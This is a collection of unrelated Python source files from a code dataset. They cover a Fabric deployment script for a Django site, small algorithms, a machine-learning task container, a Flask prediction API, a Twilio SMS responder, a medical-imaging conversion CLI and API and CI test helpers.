requirements_file='REQUIREMENTS.txt')\n #yuglify needed by django-compress needs to have node installed which\n # is provided by virtual-node in the REQUIREMENTS file above,\n # but we still need to install yuglify manually since we cant add it\n # using REQUIREMENTS.\n # See also https://github.com/elbaschid/virtual-node\n # for more info on how virtualnode works\n with cd(code_path):\n run('venv/bin/npm -g install yuglify')\n build_pil(code_path)\n\n\n@task\ndef setup_postgres_user():\n \"\"\"Set up the postgresql instance.\"\"\"\n create_user('wsgi', '')\n\n@task\ndef upload_postgres_dump(dump_path):\n \"\"\"Upload the dump found in dump_path and restore it to the server.\n\n .. note existing data on the server will be destroyed.\n\n :param dump_path: Local file containing dump to be restored.\n :type dump_path; str\n \"\"\"\n restore_postgres_dump(\n 'changelog',\n user='wsgi',\n password='',\n ignore_permissions=True,\n file_name=dump_path)\n\n\n@task\ndef update_apache():\n \"\"\"Update the apache configuration prompting for github account info.\n\n .. note:: The config file is taken from the local system.\n\n \"\"\"\n code_path = os.path.dirname(__file__)\n\n git_url = 'https://api.github.com/repos/timlinux/visual_changelog/issues'\n git_user = prompt(\n 'Please enter the github user account that issues submitted via the\\n'\n 'web ui should be created as. 
This will be written into the apache\\n'\n        'configuration file under /etc/apache2/sites-available so you\\n'\n        'should take appropriate security measures.\\nUser :\\n')\n    git_password = getpass.getpass()\n    domain = 'changelog.linfiniti.com'\n    setup_apache(\n        site_name='visual_changelog',\n        code_path=code_path,\n        domain=domain,\n        github_url=git_url,\n        github_password=git_password,\n        github_user=git_user)\n\n\n@task\ndef deploy():\n    \"\"\"Initialise or update the git clone - you can safely rerun this.\n\n    e.g. to update the server\n\n    fab -H  deploy\n\n    \"\"\"\n    # Ensure we have a mailserver setup for our domain\n    # Note that you may have problems if you intend to run more than one\n    # site from the same server\n    setup_env()\n    show_environment()\n    setup_postgis_2()\n    base_path, code_path, git_url, repo_alias, site_name = get_vars()\n\n    fastprint('Checking out %s to %s as %s' % (git_url, base_path, repo_alias))\n    update_git_checkout(base_path, git_url, repo_alias)\n    update_index()\n    require.postfix.server(site_name)\n    update_apache()\n    require.deb.package('libpq-dev')\n    require.deb.package('libgeos-c1')\n    require.deb.package('vim')\n    update_venv(code_path)\n    with cd(os.path.join(code_path, 'django_project')):\n        run('../venv/bin/python manage.py syncdb --noinput ')\n        run('../venv/bin/python manage.py migrate')\n    set_db_permissions()\n    # if we are testing under vagrant, deploy our local media and db\n    if 'vagrant' in env.fg.home:\n        with cd(code_path):\n            run('cp /vagrant/visual_changelog.db .')\n            run('touch django_project/core/wsgi.py')\n\n    sync_media_to_server()\n    collectstatic()\n    fastprint('*******************************************\\n')\n    fastprint(red(' Don\\'t forget set ALLOWED_HOSTS in '))\n    fastprint(' django_project/core/settings/prod.py')\n    fastprint(' to the domain name for the site.')\n    fastprint('*******************************************\\n')\n\n\n@task\ndef freshen():\n    \"\"\"Freshen the server with latest git copy and touch wsgi.\n\n    .. 
note:: Preferred normal way of doing this is rather to use the\n sync_project_to_server task and not to checkout from git.\n\n \"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n git_url = 'http://github.com/timlinux/visual_changelog.git'\n update_git_checkout(base_path, git_url, repo_alias)\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n collectstatic()\n\n fastprint('*******************************************\\n')\n fastprint(red(' Don\\'t forget set ALLOWED_HOSTS in \\n'))\n fastprint(' django_project/core/settings/prod.py\\n')\n fastprint(' to the domain name for the site.\\n')\n fastprint('*******************************************\\n')\n\n@task\ndef sync_media_to_server():\n \"\"\"Sync media to server from local filesystem.\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n remote_path = os.path.join(code_path, 'django_project', 'media')\n local_path = os.path.join(\n os.path.dirname(__file__), 'django_project', 'media/')\n rsync_project(\n remote_path,\n local_dir=local_path,\n exclude=['*.pyc', '*.py', '.DS_Store'])\n\n # Now our sqlite db\n remote_path = os.path.join(\n code_path, 'resources', 'sqlite', 'visual_changelog.db')\n local_path = os.path.join(\n os.path.dirname(__file__), 'resources/sqlite/visual_changelog.db')\n rsync_project(\n remote_path,\n local_dir=local_path,\n exclude=['*.pyc', '*.py', '.DS_Store'])\n set_media_permissions(code_path)\n set_db_permissions()\n\n\n@task\ndef sync_project_to_server():\n \"\"\"Synchronize project with webserver ignoring venv and sqlite db..\n This is a handy way to get your secret key to the server too...\n\n \"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n rsync_project(\n base_path,\n delete=False,\n exclude=[\n '*.pyc',\n '.git',\n '.DS_Store',\n 'visual_changelog.db',\n 'venv',\n 'django_project/static'])\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_media_permissions(code_path)\n set_db_permissions()\n collectstatic()\n fastprint(blue('Your server is now in synchronised to your local project'))\n\n@task\ndef server_to_debug_mode():\n \"\"\"Put the server in debug mode (normally not recommended).\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n config_file = os.path.join(\n code_path, 'django_project', 'core', 'settings', 'project.py')\n sed(\n config_file,\n 'DEBUG = TEMPLATE_DEBUG = False',\n 'DEBUG = TEMPLATE_DEBUG = True')\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_db_permissions()\n collectstatic()\n fastprint(red('Warning: your server is now in DEBUG mode!'))\n\n@task\ndef server_to_production_mode():\n \"\"\"Put the server in production mode (recommended).\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n config_file = os.path.join(\n code_path, 'django_project', 'core', 'settings', 'project.py')\n sed(\n config_file,\n 'DEBUG = TEMPLATE_DEBUG = True',\n 'DEBUG = TEMPLATE_DEBUG = False')\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_db_permissions()\n collectstatic()\n fastprint(blue('Note: your server is now in PRODUCTION mode!'))\n\n\n@task\ndef set_db_permissions():\n \"\"\"Set the db so user wsgi has all permissions.\n \"\"\"\n user = 'wsgi'\n dbname = 'changelog'\n grant_sql = 'GRANT ALL ON schema public to %s;' % user\n # assumption is env.repo_alias is also database name\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n 
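# the schema-level GRANT above is not enough on its own; existing tables and sequences need their own grants\n    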
grant_sql = (\n 'GRANT ALL ON ALL TABLES IN schema public to %s;' % user)\n # assumption is env.repo_alias is also database name\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n grant_sql = (\n 'GRANT ALL ON ALL SEQUENCES IN schema public to %s;' % user)\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n\n\n@task\ndef get_live_db():\n \"\"\"Get the live db - will overwrite your local copy.\"\"\"\n get_postgres_dump('changelog')\n\n@task\ndef get_live_media():\n \"\"\"Get the live media - will overwrite your local copy.\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n path = '%s/django_project/media' % code_path\n if not exists(path):\n run('mkdir %s' % path)\n local('rsync -ave ssh %s:%s/django_project/media/* django_project/media/'\n % (env['host_string'], code_path))\n\n@task\ndef collectstatic():\n \"\"\"Collect static using proper path for django-compressor / yuglify.\n\n .. note:: We are using python-node to run node in a virtual environment.\n Node is needed for yuglify, which is in turn needed by\n django-compressor which combines all js resources into a single file\n and all css into a single file. These are 'compiled' but yuglify.\n Yuglify does not appear in the path properly thus we explicitly\n ensure the path points to the node_modules dir before running\n collectstatic.\n\n All the above will prevent run time errors like:\n\n [Django] ERROR: Failed to submit message: u\"ValueError: The file\n 'css/contrib.css' could not be found with .\"\n\n \"\"\"\n command = ('PATH=$PATH:../node_modules/yuglify/bin/:../venv/bin/ '\n '../venv/bin/python manage.py collectstatic --noinput')\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n with cd(os.path.join(code_path, 'django_project')):\n run(command)\n\n@task\ndef update_migrations():\n \"\"\"Apply any pending south migrations.\n \"\"\"\n command = ('../venv/bin/python manage.py migrate changes')\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n with cd(os.path.join(code_path, 'django_project')):\n run(command)\n run('touch core/wsgi.py')\n fastprint(green('Note: your server is now has the latest SOUTH '\n 'migrations applied.'))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":12063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"203613393","text":"from SingleLinkList import Node, SingleLinkList\n\ndef reverseList(head: Node) -> SingleLinkList:\n '''翻转链表'''\n if not head:\n return SingleLinkList()\n # cur 是遍历指针\n cur = head.next\n # pre是cur的前驱节点\n pre = None\n head.next = None\n\n while cur:\n pre = cur\n cur = cur.next\n pre.next = head\n head = pre\n return SingleLinkList(head)\n","sub_path":"language/python/data_structure_python/reverseList.py","file_name":"reverseList.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"23583764","text":"from abc import ABC, abstractmethod\nfrom typing import Union\nimport numpy as np\nfrom torch.utils.data import BatchSampler, RandomSampler\nfrom continual_ai.base import ClassificationDataset\n\n\nclass ClassificationTask(ClassificationDataset):\n def __init__(self, base_dataset: ClassificationDataset, task_labels: np.ndarray, labels_map: np.ndarray,\n batch_size=16):\n\n self.__current_y = 'task'\n self.batch_size = batch_size\n self.__subset = 'train'\n self.index = None\n self.current_batch_size = None\n self.current_sampler = None\n\n 
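# parallel lists filled below from t2d, mapping this task's remapped labels back to the original dataset labels\n        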
self.dataset_labels = []\n self.task_labels = []\n\n x_train, old_y_train, y_train = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='train')\n x_test, old_y_test, y_test = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='test')\n x_dev, old_y_dev, y_dev = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='dev')\n\n super(ClassificationTask, self).__init__(x_train=x_train, y_train=y_train, x_dev=x_dev, y_dev=y_dev,\n x_test=x_test, y_test=y_test, transformer=None,\n target_transformer=None)\n\n self.final_transformer = base_dataset.transformer\n self.final_target_transformer = base_dataset.target_transformer\n\n self._old_y_train = old_y_train\n self._old_y_test = old_y_test\n self._old_y_dev = old_y_dev\n\n self.t2d = dict(zip(y_train, old_y_train))\n self.d2t = dict(zip(old_y_train, y_train))\n\n for i, j in self.t2d.items():\n self.dataset_labels.append(j)\n self.task_labels.append(i)\n\n def extract_labels(self, dataset: ClassificationDataset, labels: np.ndarray, labels_map: np.ndarray, split='train'):\n assert split in ['train', 'test', 'dev']\n getattr(dataset, split)()\n\n if dataset.x is None:\n return dataset.x, dataset.y, dataset.y\n\n idx = np.arange(len(dataset))\n x, y = dataset.data\n\n idx_c = idx[np.in1d(y, labels)]\n\n x = x[idx_c]\n y = y[idx_c]\n\n new_y = labels_map[y]\n\n return x, y, new_y\n\n def set_labels_type(self, s):\n assert s in ['task', 'dataset']\n self.__current_y = s\n\n def _y(self):\n if self.__current_y == 'task':\n y = super(ClassificationTask, self)._y()\n else:\n y = getattr(self, F'_old_y_{self._split}')\n\n return y\n\n def __len__(self):\n return super(ClassificationTask, self).__len__() # // self.batch_size + 1\n\n def __call__(self, batch_size=None, sampler=None):\n self.current_batch_size = batch_size\n return self\n\n def __iter__(self):\n\n batch = self.batch_size\n sampler = RandomSampler(self)\n\n if self.current_batch_size is not None:\n batch = self.current_batch_size\n self.current_batch_size = None\n\n if self.current_sampler is not None:\n sampler = self.current_sampler\n self.current_sampler = None\n\n for idx in BatchSampler(batch_size=batch, sampler=sampler, drop_last=False):\n x, y, idxs = [], [], []\n for i in idx:\n _i, _x, _y = self[i]\n x.append(_x)\n y.append(_y)\n idxs.append(_i)\n\n if self.final_transformer is not None:\n x = self.final_transformer(x)\n\n if self.final_target_transformer is not None:\n y = self.final_target_transformer(y)\n\n yield idxs, x, y\n\n def sample(self, size):\n for idx in BatchSampler(batch_size=size, sampler=RandomSampler(self), drop_last=False):\n x, y, idxs = [], [], []\n for i in idx:\n _i, _x, _y = self[i]\n x.append(_x)\n y.append(_y)\n idxs.append(_i)\n\n if self.final_transformer is not None:\n x = self.final_transformer(x)\n\n if self.final_target_transformer is not None:\n y = self.final_target_transformer(y)\n\n return idxs, x, y\n\n\nclass TasksContainer(ABC):\n def __init__(self, dataset: ClassificationDataset, labels_per_task: int, batch_size: int,\n shuffle_labels: bool = False,\n random_state: Union[np.random.RandomState, int] = None):\n\n self._tasks = list()\n self._current_task = 0\n self.current_batch_size = None\n\n if random_state is None or isinstance(random_state, int):\n self.RandomState = np.random.RandomState(random_state)\n elif isinstance(random_state, np.random.RandomState):\n self.RandomState = random_state\n\n self.generate_tasks(dataset, 
labels_per_task=labels_per_task, batch_size=batch_size,\n                            shuffle_labels=shuffle_labels)\n\n        for i, t in enumerate(self._tasks):\n            setattr(t, 'index', i)\n\n    def __len__(self):\n        return len(self._tasks)\n\n    @abstractmethod\n    def generate_tasks(self, dataset: ClassificationDataset, labels_per_task: int, batch_size: int,\n                       shuffle_labels: bool = False):\n        raise NotImplementedError\n\n    def add_task(self, task):\n        self._tasks.append(task)\n\n    @property\n    def task(self):\n        return self._tasks[self._current_task]\n\n    @task.setter\n    def task(self, v: int):\n        if v > len(self):\n            raise ValueError('ERROR (MODIFICARE)')\n        self._current_task = v\n\n    def __getitem__(self, i: int):\n        if i > len(self):\n            raise ValueError('ERROR (MODIFICARE)')\n        return self._tasks[i]\n\n    def __iter__(self):\n        for t in self._tasks:\n            yield t","sub_path":"continual_ai/cl_settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468197040","text":"#!/usr/bin/env python\n\n\nimport os\nimport shutil\nimport sys\n\n\nif not os.environ.get(\"TEST_NOTEBOOKS\"):\n    sys.exit(0)\n\nfor each in list(sys.argv[1:]) + [\n    \"data.tif\",\n    \"data.h5\",\n    \"data_trim.h5\",\n    \"data_dn.h5\",\n    \"data_reg.h5\",\n    \"data_sub.h5\",\n    \"data_f_f0.h5\",\n    \"data_wt.h5\",\n    \"data_norm.h5\",\n    \"data_dict.h5\",\n    \"data_post.h5\",\n    \"data_traces.h5\",\n    \"data_rois.h5\",\n    \"data_proj.h5\",\n    \"data.zarr\",\n    \"data_trim.zarr\",\n    \"data_dn.zarr\",\n    \"data_reg.zarr\",\n    \"data_sub.zarr\",\n    \"data_f_f0.zarr\",\n    \"data_wt.zarr\",\n    \"data_norm.zarr\",\n    \"data_dict.zarr\",\n    \"data_post.zarr\",\n    \"data_traces.zarr\",\n    \"data_rois.zarr\",\n    \"data_proj.zarr\",\n    \"data_proj.html\"]:\n    if os.path.isfile(each):\n        os.remove(each)\n    elif os.path.isdir(each):\n        shutil.rmtree(each)\n","sub_path":"teardown_tests.py","file_name":"teardown_tests.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55866479","text":"# Using the with statement, write a few lines of text to a file, then display them on screen.\n\n\nwith open('zad3.txt', 'w+') as plik: \n    plik.write(\"Hello world !\\n\")\n    plik.write(\"Witaj świecie !\\n\")\n    plik.write(\"Hallo Welt !\\n\") \n\n\nwith open(\"zad3.txt\", \"r\") as plik:\n    for linia in plik:\n        print(linia, end=\"\")","sub_path":"lab5/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"97764280","text":"def interleave(l):\r\n    max_len = max(map(len, l))\r\n    formed_list = []\r\n    interleaved_list = []\r\n    for i in range(len(l)):\r\n        diff_len = max_len - len(l[i])\r\n        formed_list.append(l[i] + [None]*diff_len)\r\n    for i in range(max_len):\r\n        for j in range(len(formed_list)):\r\n            interleaved_list.append(formed_list[j][i])\r\n    none_num = interleaved_list.count(None)\r\n    for i in range(none_num):\r\n        interleaved_list.remove(None)\r\n    return interleaved_list\r\n\r\ndef funky_merge(*objs):\r\n    objs = list(objs)[:]\r\n    out_obj = {}\r\n    used_key = []\r\n    all_key = set()\r\n    for obj in objs:\r\n        for key in obj.keys():\r\n            all_key = all_key | {key}\r\n    for key in all_key:\r\n        all_list = []\r\n        all_obj = []\r\n        value_type = ''\r\n        for j in range(len(objs)):\r\n            value = objs[j].get(key)\r\n            if value is None:\r\n                continue\r\n            value_type = type(value)\r\n            if value_type is int:\r\n                out_obj[key] 
= value\r\n if value_type is list:\r\n all_list.append(value)\r\n if value_type is dict:\r\n all_obj.append(value)\r\n if value_type is list:\r\n interleaved_list = interleave(all_list)\r\n out_obj[key] = interleaved_list\r\n if value_type is dict:\r\n out_obj[key] = funky_merge(*all_obj)\r\n return out_obj\r\n\r\ndef main():\r\n obj1 = {\"a\":1,\"b\":{\"c\":2,\"d\":[2,0],\"e\":4}}\r\n obj2 = {\"a\":2,\"b\":{\"c\":1,\"d\":[1,2,3],\"f\":5}}\r\n obj3 = {\"b\":{\"d\":[4]}}\r\n data = [obj1,obj2,obj3]\r\n\r\n result = funky_merge(*data)\r\n print(result)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"others/funky_merge/funky_merge.py","file_name":"funky_merge.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"35658968","text":"import sys\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask_restful import Api\nfrom flask_restful import Resource\nfrom flask_restful import reqparse\nfrom sklearn.externals import joblib\nimport pandas as pd\n\n\napp = Flask(__name__)\napi = Api(app)\nparser = reqparse.RequestParser()\nparser.add_argument(\"sample_uuid\", type=str)\n# add features for model\nfor feature in ['approx_payout_date', 'body_length', 'channels', 'event_created', 'event_end', 'event_start',\n 'fb_published', 'has_analytics','has_logo', 'name_length', 'num_order', 'num_payouts', 'object_id',\n 'sale_duration2', 'show_map', 'user_age', 'user_created', 'user_type']:\n parser.add_argument(feature, type=int)\n\n\nclass Predict(Resource):\n def __init__(self, *args, **kwargs):\n super(Predict, self).__init__(*args, **kwargs)\n self.model_file = 'api/best_model.pkl'\n self.load_model()\n\n def get(self):\n arguments = parser.parse_args()\n # transform to pandas and remove user id\n arguments_df = pd.DataFrame.from_dict(arguments, orient='index').T\n arguments_df.pop('sample_uuid')\n result = {\n 'probability': self.model.predict_proba(arguments_df)[0, 1],\n 'label': int(self.model.predict(arguments_df)[0]),\n 'sample_uuid': arguments['sample_uuid'],\n }\n return jsonify(**result)\n\n def load_model(self):\n self.model = joblib.load(self.model_file)\n return self\n\n\napi.add_resource(Predict, '/api/v1/predict')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False, port=5000)","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270268741","text":"# /usr/bin/env python\n\n'''\nThis acts like a server\n'''\nfrom flask import Flask, request\nfrom twilio.twiml.messaging_response import MessagingResponse\n# My common methods\nfrom commonMethods import *\n\n# This can be any service/product/customer care/emergency services number\n# twilioNumber = \"yyy\"\n# customerNumber = \"xxx\"\n\napp = Flask(__name__)\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_reply():\n \"\"\"Respond to incoming messages and create a conversation\"\"\"\n txMsgBody = \"\"\n\n rxFromNumber = request.values.get('From')\n rxMsgBody = request.values.get('Body')\n rxMsgBody = rxMsgBody.capitalize()\n\n if any( [rxMsgBody == \"Yes\", rxMsgBody == \"Y\"] ):\n txMsgBody += \"Great! \"\n elif any( [rxMsgBody == \"No\", rxMsgBody == \"N\"] ):\n txMsgBody += \"Okay. I'll check with next in line\"\n else:\n txMsgBody += \"Do you mind getting with Shrek? 
\"\n\n # Start our response\n resp = MessagingResponse()\n\n # Add a message\n txMsgBody += greetingString('end')\n resp.message(txMsgBody)\n\n return str(resp)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330175909","text":"#!/usr/bin/env python\nimport argparse\nfrom rhscripts.conversion import rtx_to_nii\nfrom rhscripts.version import __show_version__\n\n\n__scriptname__ = 'rtx2nii'\n__version__ = '0.0.1'\n\n##\n# RTX2NII python script\n# VERSIONS:\n# - 0.0.1 :: 2021-06-15 : Added script as a copy of rtx2mnc\n\nparser = argparse.ArgumentParser(description='RTX2NII.')\nparser.add_argument('RTX', help='Path to the DICOM RTX file', nargs='?')\nparser.add_argument('container', help='Path to the Nifty container file', nargs='?')\nparser.add_argument('output', help='Path to the OUTPUT Nifty RT file', nargs='?')\nparser.add_argument('--behavior', help='Choose how to convert to polygon. Options: default, mirada',type=str,default='default')\nparser.add_argument(\"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\n#parser.add_argument(\"--copy_name\", help=\"Copy the name of the RTstruct (defined in Mirada) to the tag dicom_0x0008:el_0x103e of the MNC file\", action=\"store_true\")\nparser.add_argument(\"--version\", help=\"Print version\", action=\"store_true\")\n\nargs = parser.parse_args()\n\nif args.version:\n\tprint('%s version: %s' % (__scriptname__,__version__))\n\t__show_version__()\n\texit(-1)\n\nif not args.RTX or not args.container or not args.output:\n\tparser.print_help()\n\tprint('Too few arguments')\n\texit(-1)\n\nrtx_to_nii(dcmfile=args.RTX,\n nii_container_file = args.container,\n nii_output_file = args.output,\n behavior=args.behavior,\n verbose=args.verbose,\n copy_name=False) # not yet implemented\n","sub_path":"conversion/rtx2nii.py","file_name":"rtx2nii.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"545575598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains the slc.shoppinglist package\n\"\"\"\nimport os\nfrom setuptools import setup, find_packages\n\ndef read(*rnames):\n return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\n\nversion = '1.5'\n\nlong_description = (\n read('README.txt')\n + '\\n' +\n 'Change history\\n'\n '**************\\n'\n + '\\n' +\n read('CHANGES.txt')\n + '\\n' +\n 'Detailed Documentation\\n'\n '**********************\\n'\n + '\\n' +\n read('slc', 'shoppinglist', 'README.txt')\n + '\\n' +\n 'Contributors\\n'\n '************\\n'\n + '\\n' +\n read('CONTRIBUTORS.txt')\n + '\\n' \n )\n\nsetup(name='slc.shoppinglist',\n version=version,\n description=\"A shoppinglist of UIDs\",\n long_description=long_description,\n # Get more strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)\",\n ],\n keywords='',\n author='syslab.com',\n author_email='thomas@syslab.com',\n url='http://www.syslab.com',\n license='GPL + EUPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['slc'],\n 
include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n # -*- Extra requirements: -*-\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n 'mock',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"pypi_install_script/slc.shoppinglist-1.5/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438540821","text":"\"\"\"\n@author: wangyaxiong\n@time: 2018/10/31\n@desc:1、发送请求 2、断言返回结果 3、记录并返回所有、成功、失败、错误用例数\n\n\"\"\"\n\nimport json,os,yaml\nfrom mylib.getcase import GetCase\nfrom mylib.myrequest import MyRequest\nfrom mylib.getconf import GetConf\nfrom mylib.mylog import logger\n\nclass SendRequest:\n\n def __init__(self,server,method,contentType,secret,path,params,exceptResult,env):\n self.server = server\n self.method = method\n self.contentType = contentType\n self.secret = secret\n self.path = path\n self.params = params\n self.exceptResult = exceptResult\n self.env = env\n self.dir = os.path.dirname(os.path.dirname(__file__))\n self.yamlFile = os.path.join(self.dir,'conf','conf.yaml')\n \n def get_conf(self):\n try:\n with open(self.yamlFile,'r',encoding='UTF-8') as f:\n yamlLoad = yaml.load(f)\n except Exception as e:\n logger.error('获取配置失败,原因:{}'.format(e))\n else:\n return yamlLoad\n\n def assertRequest(self):\n result = []\n successCaseNo = 0\n failureCaseNo = 0\n errCaseNo = 0\n allCaseNo = 0\n req = MyRequest()\n conf = self.get_conf()\n url = conf[self.env]['url']\n for i in range(0,len(self.method)):\n complete_url = 'http://' + self.server[i] + url + self.path[i]\n accessKey = conf[self.env][self.server[i]]['accessKey']\n if self.method[i] == 'POST' and self.contentType[i] == 'x-www-form-urlencoded' and self.secret[i] == 'no':\n result1 = req.postForm(complete_url,self.params[i])\n resultToJson = json.loads(self.exceptResult[i])\n if result1 == 'error':\n errCaseNo += 1\n allCaseNo += 1 \n result.append('ERROR')\n elif result1 != resultToJson :\n failureCaseNo += 1\n allCaseNo += 1\n result.append('FAILURE')\n logger.info('不符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif result1 == resultToJson :\n successCaseNo += 1\n allCaseNo += 1\n result.append('SCCESS')\n logger.info('符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif self.method[i] == 'POST' and self.contentType[i] == 'json' and self.secret[i] == 'yes':\n result1 = req.post_json_sign(complete_url,self.server[i],accessKey,self.params[i])\n resultToJson = json.loads(self.exceptResult[i])\n if result1 == 'error':\n errCaseNo += 1\n allCaseNo += 1\n result.append('ERROR')\n elif result1 != resultToJson :\n failureCaseNo += 1\n allCaseNo += 1\n result.append('FAILURE')\n logger.info('不符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif result1 == resultToJson :\n successCaseNo += 1\n allCaseNo += 1\n result.append('SCCESS')\n logger.info('符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n else:\n errCaseNo += 1\n allCaseNo += 1\n result.append('ERROR') \n \n return allCaseNo,successCaseNo,failureCaseNo,errCaseNo,result\n \nif __name__ == \"__main__\":\n filepath = r\"d:\\apiTest\\data\\case.xlsx\"\n sheet = 'customer'\n get_case = GetCase()\n env = 'test231'\n caseid,name,method,contentType,module,path,params,exceptResult = get_case.readExcel(filepath,sheet)\n SendRequest(caseid,name,method,contentType,module,path,params,exceptResult,env).assertRequest()\n\n # 
caseid,name,method,contentType,path,params,assertion = readExcel(filepath,\"Sheet1\")\n    # print(caseid,name,method,contentType,path,params,assertion)\n\n\n\n","sub_path":"mylib/sendRequest.py","file_name":"sendRequest.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"354610789","text":"\"\"\"\nChallenge #34 Intermediate\n    Your task today is show the implementation of two sorting algorithms Stooge sort and Bogosort in anyway you like!\n\"\"\"\nfrom random import shuffle\n\n\ndef is_sorted(arr):\n    for x, y in zip(arr, arr[1:]):\n        if x > y:\n            return False\n    return True\n\n\ndef bogosort(arr):\n    shuffle(arr)\n    while not is_sorted(arr):\n        shuffle(arr)\n    return arr\n\n\ndef stooge_sort(arr, j, i=0):\n    if arr[j] < arr[i]:\n        tmp = arr[j]\n        arr[j] = arr[i]\n        arr[i] = tmp\n    if j - i + 1 > 2:\n        t = (j - i + 1) // 3\n        # recurse with (arr, high, low) to match the signature: first two\n        # thirds, last two thirds, then first two thirds again\n        stooge_sort(arr, j - t, i)\n        stooge_sort(arr, j, i + t)\n        stooge_sort(arr, j - t, i)\n\n    return arr\n\n\nif __name__ == '__main__':\n    l = [3, 1, 5, 4, 2]\n    print(bogosort(l))\n    print(stooge_sort(l, len(l) - 1))\n","sub_path":"challenge_0034.py","file_name":"challenge_0034.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"166393282","text":"# https://atcoder.jp/contests/abc146/tasks/abc146_c\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda :sys.stdin.readline().rstrip()\n\ndef bisection(l,r,f,left=True,discrete=True):\n    eps=1 if discrete else 10**-12\n    if((not left)^f(r)): return r if left else r+1\n    elif(left^f(l)): return l-1 if left else l\n    while(r-l>eps):\n        h=(l+r)//2 if discrete else (l+r)/2\n        if((not left)^f(h)): l=h\n        else: r=h\n    return (l+r)/2 if not discrete else l if left else r\n\nfrom math import log10\n\ndef resolve():\n    a,b,x=map(int,input().split())\n    def check(n):\n        return a*n+b*(int(log10(n))+1)<=x\n    print(bisection(1,10**9,check))\nresolve()\n","sub_path":"ABC146/c_buy_an_integer.py","file_name":"c_buy_an_integer.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"293170530","text":"import os, subprocess, string, sys;\n\nenvironment_var = os.getenv('PLUGIN_KUBECTL_COMMANDS', '')\n\nreturncode = 0\nif environment_var:\n    commands = environment_var.split(\",\")\n\n    for command in commands:\n        try:\n            p = subprocess.Popen('kubectl ' + str(command), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=os.environ)\n            (out,err) = p.communicate()\n            if p.returncode == 0:\n                print (\"command kubectl %s succeeded, returned: %s\" % (str(command),str(out)))\n            elif p.returncode <= 125:\n                print (\"command kubectl %s failed, exit-code=%d error = %s\" % 